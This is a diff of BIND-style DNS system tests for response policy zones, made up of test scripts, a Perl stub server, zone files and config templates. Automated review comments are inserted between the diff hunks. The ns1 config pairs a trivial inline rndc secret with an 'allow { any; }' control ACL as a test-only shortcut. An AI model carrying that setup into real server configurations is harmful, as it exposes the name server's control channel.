dig.out.$t.before + grep "status: NXDOMAIN" dig.out.$t.before >/dev/null || setret "failed" + # Add a sibling name (a6-1.tld2.mixed-case-rpz, with "tld2" in lowercase + # rather than uppercase) before A6-2.TLD.mixed-case-rpz. 
+ nextpart ns3/named.run > /dev/null + cp ns3/mixed-case-rpz-2.db.in ns3/mixed-case-rpz.db + rndc_reload ns3 $ns3 mixed-case-rpz + wait_for_log 20 "rpz: mixed-case-rpz: reload done" ns3/named.run + # a6-2.tld2 NOERROR answers should still be rewritten to NXDOMAIN answers. + # (The bug we try to trigger here caused a6-2.tld2.mixed-case-rpz to be + # erroneously removed from the summary RPZ database after reload.) + $DIG -p ${PORT} @$ns3 a6-2.tld2. A > dig.out.$t.after + grep "status: NXDOMAIN" dig.out.$t.after >/dev/null || setret "failed" + fi + + t=`expr $t + 1` + echo_i "checking that ttl values are not zeroed when qtype is '*' (${t})" + $DIG +noall +answer -p ${PORT} @$ns3 any a3-2.tld2 > dig.out.$t + ttl=`awk '/a3-2 tld2 text/ {print $2}' dig.out.$t` + if test ${ttl:=0} -eq 0; then setret "failed"; fi + + t=`expr $t + 1` + echo_i "checking rpz updates/transfers with parent nodes added after children (${t})" + # regression test for RT #36272: the success condition + # is the secondary server not crashing. + for i in 1 2 3 4 5; do + nsd $ns5 add example.com.policy1. '*.example.com.policy1.' + nsd $ns5 delete example.com.policy1. '*.example.com.policy1.' + done + for i in 1 2 3 4 5; do + nsd $ns5 add '*.example.com.policy1.' example.com.policy1. + nsd $ns5 delete '*.example.com.policy1.' example.com.policy1. + done + + t=`expr $t + 1` + echo_i "checking that going from an empty policy zone works (${t})" + nsd $ns5 add '*.x.servfail.policy2.' x.servfail.policy2. 
+ sleep 1 + rndc_reload ns7 $ns7 policy2 + $DIG z.x.servfail -p ${PORT} @$ns7 > dig.out.${t} + grep NXDOMAIN dig.out.${t} > /dev/null || setret "failed" + + t=`expr $t + 1` + echo_i "checking that "add-soa no" at rpz zone level works (${t})" + $DIG z.x.servfail -p ${PORT} @$ns7 > dig.out.${t} + grep SOA dig.out.${t} > /dev/null && setret "failed" + + if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "checking that "add-soa yes" at response-policy level works (${t})" + $DIG walled.tld2 -p ${PORT} +noall +add @$ns3 > dig.out.${t} + grep "^manual-update-rpz\..*SOA" dig.out.${t} > /dev/null || setret "failed" + fi + + if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "reconfiguring server with 'add-soa no' (${t})" + cp ns3/named.conf ns3/named.conf.tmp + sed -e "s/add-soa yes/add-soa no/g" < ns3/named.conf.tmp > ns3/named.conf + rndc_reconfig ns3 $ns3 + echo_i "checking that 'add-soa no' at response-policy level works (${t})" + $DIG walled.tld2 -p ${PORT} +noall +add @$ns3 > dig.out.${t} + grep "^manual-update-rpz\..*SOA" dig.out.${t} > /dev/null && setret "failed" + fi + + if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "checking that 'add-soa unset' works (${t})" + $DIG walled.tld2 -p ${PORT} +noall +add @$ns8 > dig.out.${t} + grep "^manual-update-rpz\..*SOA" dig.out.${t} > /dev/null || setret "failed" + fi + + # dnsrps does not allow NS RRs in policy zones, so this check + # with dnsrps results in no rewriting. 
+ if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "checking rpz with delegation fails correctly (${t})" + $DIG -p ${PORT} @$ns3 ns example.com > dig.out.$t + grep "status: SERVFAIL" dig.out.$t > /dev/null || setret "failed" + + t=`expr $t + 1` + echo_i "checking policies from expired zone are no longer in effect ($t)" + $DIG -p ${PORT} @$ns3 a expired > dig.out.$t + grep "expired.*10.0.0.10" dig.out.$t > /dev/null && setret "failed" + grep "fast-expire/IN: response-policy zone expired" ns3/named.run > /dev/null || setret "failed" + fi + + # RPZ 'CNAME *.' (NODATA) trumps DNS64. Test against various DNS64 scenarios. + for label in a-only no-a-no-aaaa a-plus-aaaa + do + for type in AAAA A + do + t=`expr $t + 1` + case $label in + a-only) + echo_i "checking rpz 'CNAME *.' (NODATA) with dns64, $type lookup with A-only (${t})" + ;; + no-a-no-aaaa) + echo_i "checking rpz 'CNAME *.' (NODATA) with dns64, $type lookup with no A or AAAA (${t})" + ;; + a-plus-aaaa) + echo_i "checking rpz 'CNAME *.' 
(NODATA) with dns64, $type lookup with A and AAAA (${t})" + ;; + esac + ret=0 + $DIG ${label}.example -p ${PORT} $type @10.53.0.9 > dig.out.${t} + grep "status: NOERROR" dig.out.$t > /dev/null || ret=1 + grep "ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2$" dig.out.$t > /dev/null || ret=1 + grep "^rpz" dig.out.$t > /dev/null || ret=1 + [ $ret -eq 0 ] || echo_i "failed" + status=`expr $status + $ret` + done + done + + if [ native = "$mode" ]; then + t=`expr $t + 1` + echo_i "checking that rewriting CD=1 queries handles pending data correctly (${t})" + $RNDCCMD $ns3 flush + $RNDCCMD $ns6 flush + $DIG a7-2.tld2s -p ${PORT} @$ns6 +cd > dig.out.${t} + grep -w "1.1.1.1" dig.out.${t} > /dev/null || setret "failed" + fi + + [ $status -ne 0 ] && pf=fail || pf=pass + case $mode in + native) + native=$status + echo_i "status (native RPZ sub-test): $status ($pf)";; + + dnsrps) + dnsrps=$status + echo_i "status (DNSRPS sub-test): $status ($pf)";; + *) echo_i "invalid test mode";; + esac +done +status=`expr ${native:-0} + ${dnsrps:-0}` + +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rpzrecurse/README b/bin/tests/system/rpzrecurse/README new file mode 100644 index 0000000..5936e05 --- /dev/null +++ b/bin/tests/system/rpzrecurse/README 
@@ -0,0 +1,124 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+These tests check RPZ recursion behavior (including skipping
+recursion when appropriate).
+
+The general structure of the tests is:
+
+* The resolver (ns2) with an unqualified view containing the policy
+ zones, the response-policy statement, and a root hint zone
+
+* The auth server that contains two authoritative zones, l1.l0 and
+ l2.l1.l0, both delegated to itself. l2.l1.l0 specifies a non-existent
+ zone data file and so will generate SERVFAILs for any queries to it.
+
+The l2.l1.l0 zone was chosen to generate SERVFAIL responses because RPZ
+evaluation will use that error response whenever it encounters it during
+processing, thus making it a binary indicator for whether or not
+recursion was attempted. This also allows us to not worry about having
+to craft 'ip', 'nsdname', and 'nsip' rules that matched the queries.
+
+Each test is intended to be fed a number of queries constructed as
+qXX.l2.l1.l0, where XX is the 1-based query sequence number (e.g. the
+first query of each test is q01.l2.l1.l0).
+
+For all the tests the triggers are constructed as follows:
+client-ip - match 127.0.0.1/32
+ip - match 255.255.255.255/32 (does not matter due to SERVFAIL)
+nsdname - match ns.example.org (also does not matter)
+nsip - match 255.255.255.255/32 (also does not matter)
+qname - match qXX.l2.l1.l0, where XX is the query sequence number that
+is intended to be matched by this qname rule.
+
+Here's the detail on the test cases:
+
+Group 1 - testing skipping recursion for a single policy zone with only
+records that allow recursion to be skipped
+
+Test 1a:
+ 1 policy zone containing 1 'client-ip' trigger
+ 1 query, expected to skip recursion
+
+Test 1b:
+ 1 policy zone containing 1 'qname' trigger (q01)
+ 2 queries, q01 is expected to skip recursion, q02 is expected to
+ recurse
+
+Test 1c:
+ 1 policy zone containing both a 'client-ip' and 'qname' trigger (q02)
+ 1 query, expected to skip recursion
+
+Group 2 - testing skipping recursion with multiple policy zones when all
+zones have only trigger types eligible to skip recursion with
+
+Test 2a:
+ 32 policy zones, each containing 1 'qname' trigger (qNN, where NN is
+ the zone's sequence 1-based sequence number formatted to 2 digits,
+ so each of the first 32 queries should match a different zone)
+ 33 queries, the first 32 of which are expected to skip recursion
+ while the 33rd is expected to recurse
+
+Group 3 - Testing interaction of triggers that require recursion when in
+a single zone, both alone and with triggers that allow recursion to be
+skipped
+
+Test 3a:
+ 1 policy zone containing 1 'ip' trigger
+ 1 query, expected to recurse
+
+Test 3b:
+ 1 policy zone containing 1 'nsdname' trigger
+ 1 query, expected to recurse
+
+Test 3c:
+ 1 policy zone containing 1 'nsip' trigger
+ 1 query, expected to recurse
+
+Test 3d:
+ 1 policy zone containing 1 'ip' trigger and 1 'qname' trigger (q02)
+ 2 queries, the first should not recurse and the second should recurse
+
+Test 3e:
+ 1 policy zone containing 1 'nsdname' trigger and 1 'qname' trigger
+ (q02)
+ 2 queries, the first should not recurse and the second should recurse
+
+Test 3f:
+ 1 policy zone containing 1 'nsip' trigger and 1 'qname' trigger (q02)
+ 2 queries, the first should not recurse and the second should recurse
+
+Group 4 - contains 32 subtests designed to verify that recursion is
+skippable for only the appropriate zones based on the order specified in
+the 'response-policy' statement
+
+Tests 4aa to 4bf:
+ 32 policy zones per test, one of which is configured with 1 'ip'
+ trigger and one 'qname' trigger while the others are configured
+ only with 1 'qname' trigger. The zone with both triggers starts
+ listed first and is moved backwards by one position with each
+ test. The 'qname' triggers in the zones are structured so that
+ the zones are tested starting with the first zone and the 'ip'
+ trigger is tested before the 'qname' trigger for that zone.
+ 33 queries per test, where the number expected to skip recursion
+ matches the test sequence number: e.g. 1 skip for 4aa, 26 skips
+ for 4az, and 32 skips for 4bf
+
+Group 5 - This test verifies that the "pivot" policy zone for whether or
+not recursion can be skipped is the first listed zone with applicable
+trigger types rather than a later listed zone.
+
+Test 5a:
+ 5 policy zones, the 1st, 3rd, and 5th configured with 1 'qname'
+ trigger each (q01, q04, and q06, respectively), the 2nd and 4th
+ each configured with an 'ip' and 'qname' trigger (q02 and q05,
+ respectively for the 'qname' triggers
+ 6 queries, of which only q01 and q02 are expected to skip recursion
diff --git a/bin/tests/system/rpzrecurse/ans5/ans.pl b/bin/tests/system/rpzrecurse/ans5/ans.pl
new file mode 100644
index 0000000..9c5efb3
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ans5/ans.pl
@@ -0,0 +1,81 @@
+#!/usr/bin/perl -w
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+use IO::File;
+use IO::Socket;
+use Net::DNS;
+use Net::DNS::Packet;
+
+my $localport = int($ENV{'PORT'});
+if (!$localport) { $localport = 5300; }
+
+my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.5",
+ LocalPort => $localport, Proto => "udp") or die "$!";
+
+my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!";
+print $pidf "$$\n" or die "cannot write pid file: $!";
+$pidf->close or die "cannot close pid file: $!";
+sub rmpid { unlink "ans.pid"; exit 1; };
+
+$SIG{INT} = \&rmpid;
+$SIG{TERM} = \&rmpid;
+
+for (;;) {
+ $sock->recv($buf, 512);
+
+ print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n";
+
+ my $packet;
+
+ if ($Net::DNS::VERSION > 0.68) {
+ $packet = new Net::DNS::Packet(\$buf, 0);
+ $@ and die $@;
+ } else {
+ my $err;
+ ($packet, $err) = new Net::DNS::Packet(\$buf, 0);
+ $err and die $err;
+ }
+
+ print "REQUEST:\n";
+ $packet->print;
+
+ $packet->header->qr(1);
+
+ my @questions = $packet->question;
+ my $qname = $questions[0]->qname;
+ my $qtype = $questions[0]->qtype;
+
+ my $donotrespond = 0;
+
+ $packet->header->aa(1);
+ if ($qtype eq "A") {
+ $packet->push("answer",
+ new Net::DNS::RR($qname .
+ " 300 A 10.53.0.5"));
+ #} elsif ($qtype eq "AAAA") {
+ #$packet->push("answer",
+ #new Net::DNS::RR($qname .
+ #" 300 AAAA 2001:db8:beef::1"));
+ } elsif ($qtype eq "NS") {
+ $donotrespond = 1;
+ }
+
+ if ($donotrespond == 0) {
+ $sock->send($packet->data);
+ print "RESPONSE:\n";
+ $packet->print;
+ print "\n";
+ } else {
+ print "DROP:\n";
+ }
+}
diff --git a/bin/tests/system/rpzrecurse/clean.sh b/bin/tests/system/rpzrecurse/clean.sh
new file mode 100644
index 0000000..7b1a8a9
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/clean.sh
@@ -0,0 +1,34 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# Clean up after rpz tests.
+
+rm -f dig.out.*
+
+rm -f ns*/named.lock
+rm -f ns*/named.memstats
+rm -f ns*/*.run
+rm -f ns*/*core *core
+rm -f ns*/named.conf
+
+rm -f ns2/*.local
+rm -f ns2/*.queries
+rm -f ns2/named.[0-9]*.conf
+rm -f ns2/named.conf.header
+
+rm -f ns3/named2.conf
+rm -f ns3/named.run.prev
+
+rm -f dnsrps*.conf dnsrpzd*
+rm -f ns*/session.key
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
diff --git a/bin/tests/system/rpzrecurse/ns1/db.l0 b/bin/tests/system/rpzrecurse/ns1/db.l0
new file mode 100644
index 0000000..e6077fc
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns1/db.l0
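Review bot: In the `for (;;)` receive loop of ans.pl, a single malformed or question-less datagram ends the whole answer server: a packet that fails to parse goes straight to `die`, and `$questions[0]->qname` is called without checking that the question section is non-empty. The return value of `$sock->recv($buf, 512)` is ignored as well, so a failed receive is parsed as if it were a request. For a fixture that must stay up for the whole test run, skipping the bad packet is the safer behaviour, e.g. `defined $sock->recv($buf, 512) or next;` and `next unless @questions;`, with parse errors printed and `next`ed rather than `die`d. `$buf` is also never declared with `my`; adding `use strict;` would surface that.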
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 60
+@ IN SOA root.ns ns 1996072700 3600 1800 86400 60
+ NS ns
+ns A 10.53.0.1
+l1 NS ns.l1
+ns.l1 A 10.53.0.1
diff --git a/bin/tests/system/rpzrecurse/ns1/db.l1.l0 b/bin/tests/system/rpzrecurse/ns1/db.l1.l0
new file mode 100644
index 0000000..f51d5f7
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns1/db.l1.l0
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 60
+@ IN SOA root.ns ns 1996072700 3600 1800 86400 60
+ NS ns
+ns A 10.53.0.1
+l2 NS ns.l2
+ns.l2 A 10.53.0.1
diff --git a/bin/tests/system/rpzrecurse/ns1/example.com.db b/bin/tests/system/rpzrecurse/ns1/example.com.db
new file mode 100644
index 0000000..3bd11ec
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns1/example.com.db
@@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA ns.example.com. root.example.com. 1 3600 3600 3600 3600 +@ NS ns.example.com. + +ns.example.com. A 10.53.0.1 +@ A 1.2.3.4 +www A 1.2.3.5 diff --git a/bin/tests/system/rpzrecurse/ns1/example.db b/bin/tests/system/rpzrecurse/ns1/example.db new file mode 100644 index 0000000..0e71776 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/example.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA root.example. example. 1 3600 3600 3600 3600 +@ IN NS ns.example. +www IN CNAME cname +cname IN A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns1/named.conf.in b/bin/tests/system/rpzrecurse/ns1/named.conf.in new file mode 100644 index 0000000..f1e4c5c --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/named.conf.in 
@@ -0,0 +1,75 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ session-keyfile "session.key";
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ querylog yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type master;
+ file "root.db";
+};
+
+zone "test.example.org" {
+ type master;
+ file "example.db";
+};
+
+zone "l0" {
+ type master;
+ file "db.l0";
+};
+
+zone "l1.l0" {
+ type master;
+ file "db.l1.l0";
+};
+
+zone "l2.l1.l0" {
+ type master;
+ file "does-not-exist";
+};
+
+zone "test1.example.net" {
+ type master;
+ file "test1.example.net.db";
+};
+
+zone "test2.example.net" {
+ type master;
+ file "test2.example.net.db";
+};
+
+zone "example.com" {
+ type master;
+ file "example.com.db";
+};
diff --git a/bin/tests/system/rpzrecurse/ns1/root.db b/bin/tests/system/rpzrecurse/ns1/root.db
new file mode 100644
index 0000000..51be203
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns1/root.db
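Review bot: The rndc secret is written inline as `secret "1234abcd8765";` in the `key rndc_key` block of ns1/named.conf.in, while ns3/named1.conf.in in this same commit loads its key with `include "../../common/rndc.key";`. If that shared file defines the same `rndc_key` (it is not visible here), using the include in ns1 as well keeps the credential in one place. The `controls` line pairs the key with `allow { any; }`, so the key is the only thing restricting the control channel; a comment above `controls` such as `/* test fixture only: do not reuse this key or the allow { any; } ACL outside the system tests */` would make that explicit for anyone copying the file. The same inline key and ACL appear in ns2/named.conf.header.in.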
@@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA muks.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.example. +ns.example. A 10.53.0.1 + +l0. NS ns.l0. +ns.l0. A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns1/test1.example.net.db b/bin/tests/system/rpzrecurse/ns1/test1.example.net.db new file mode 100644 index 0000000..66ca007 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/test1.example.net.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA root.example. example. 1 3600 3600 3600 3600 +@ NS ns.example. +ns.example. A 10.53.0.1 +test1.example.net. A 1.2.3.4 +www.test1.example.net. A 5.6.7.8 diff --git a/bin/tests/system/rpzrecurse/ns1/test2.example.net.db b/bin/tests/system/rpzrecurse/ns1/test2.example.net.db new file mode 100644 index 0000000..57db115 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/test2.example.net.db 
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA root.example. example. 1 3600 3600 3600 3600 +@ NS ns.example. +ns.example. A 10.53.0.1 +test2.example.net. A 8.7.6.5 +www.test2.example.net. A 4.3.2.1 diff --git a/bin/tests/system/rpzrecurse/ns2/db.clientip1 b/bin/tests/system/rpzrecurse/ns2/db.clientip1 new file mode 100644 index 0000000..f0d53d2 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.clientip1 @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.4.0.53.10.rpz-client-ip A 10.53.0.2 +24.0.0.53.10.rpz-client-ip A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns2/db.clientip2 b/bin/tests/system/rpzrecurse/ns2/db.clientip2 new file mode 100644 index 0000000..dfcc341 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.clientip2 
@@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +24.0.0.53.10.rpz-client-ip A 10.53.0.3 diff --git a/bin/tests/system/rpzrecurse/ns2/db.clientip21 b/bin/tests/system/rpzrecurse/ns2/db.clientip21 new file mode 100644 index 0000000..4ce2af1 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.clientip21 @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.3.0.53.10.rpz-client-ip A 10.53.0.1 +31.2.0.53.10.rpz-client-ip CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/db.given b/bin/tests/system/rpzrecurse/ns2/db.given new file mode 100644 index 0000000..d464a53 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.given 
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN given.zone.
+$TTL 3600
+@ IN SOA ns.given.zone. hostmaster.given.zone. 1 600 300 604800 3600
+ IN NS ns.given.zone.
+
+ns.given.zone. IN A 127.0.0.1
+; this should be ignored as it matches an earlier passthru entry.
+example.com CNAME .
+; this should be ignored as it matches an earlier wildcard passthru entry.
+www.example.com CNAME .
diff --git a/bin/tests/system/rpzrecurse/ns2/db.invalidprefixlength b/bin/tests/system/rpzrecurse/ns2/db.invalidprefixlength
new file mode 100644
index 0000000..f496670
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns2/db.invalidprefixlength
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 60
+@ IN SOA root.ns ns 1996072700 3600 1800 86400 60
+ NS ns
+ns A 127.0.0.1
+1000.4.0.53.10.rpz-client-ip A 10.53.0.1
diff --git a/bin/tests/system/rpzrecurse/ns2/db.log1 b/bin/tests/system/rpzrecurse/ns2/db.log1
new file mode 100644
index 0000000..495885b
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns2/db.log1
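Review bot: The owner name `1000.4.0.53.10.rpz-client-ip` in db.invalidprefixlength carries a prefix length of 1000, which cannot be valid for an IPv4 client-IP trigger, yet nothing in the file says this is deliberate. db.given in the same directory documents its intentionally ignored records with `;` comments, and this file should do the same, for example `; prefix length 1000 is deliberately out of range; the server is expected to reject this trigger`. What the test actually asserts (a load failure, a log message, or a silently ignored record) is not visible in this hunk, so the wording should be matched to the test script.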
@@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.4.0.53.10.rpz-client-ip A 10.53.0.4 diff --git a/bin/tests/system/rpzrecurse/ns2/db.log2 b/bin/tests/system/rpzrecurse/ns2/db.log2 new file mode 100644 index 0000000..91ff8c5 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.log2 @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.4.0.53.10.rpz-client-ip A 10.53.0.4 +32.3.0.53.10.rpz-client-ip A 10.53.0.3 diff --git a/bin/tests/system/rpzrecurse/ns2/db.log3 b/bin/tests/system/rpzrecurse/ns2/db.log3 new file mode 100644 index 0000000..65ed980 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.log3 
@@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.4.0.53.10.rpz-client-ip A 10.53.0.4 +32.3.0.53.10.rpz-client-ip A 10.53.0.3 +32.2.0.53.10.rpz-client-ip A 10.53.0.2 diff --git a/bin/tests/system/rpzrecurse/ns2/db.passthru b/bin/tests/system/rpzrecurse/ns2/db.passthru new file mode 100644 index 0000000..eac3533 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.passthru @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN passthru.zone. +$TTL 3600 +@ IN SOA ns.passthru.zone. hostmaster.passthru.zone. 1 600 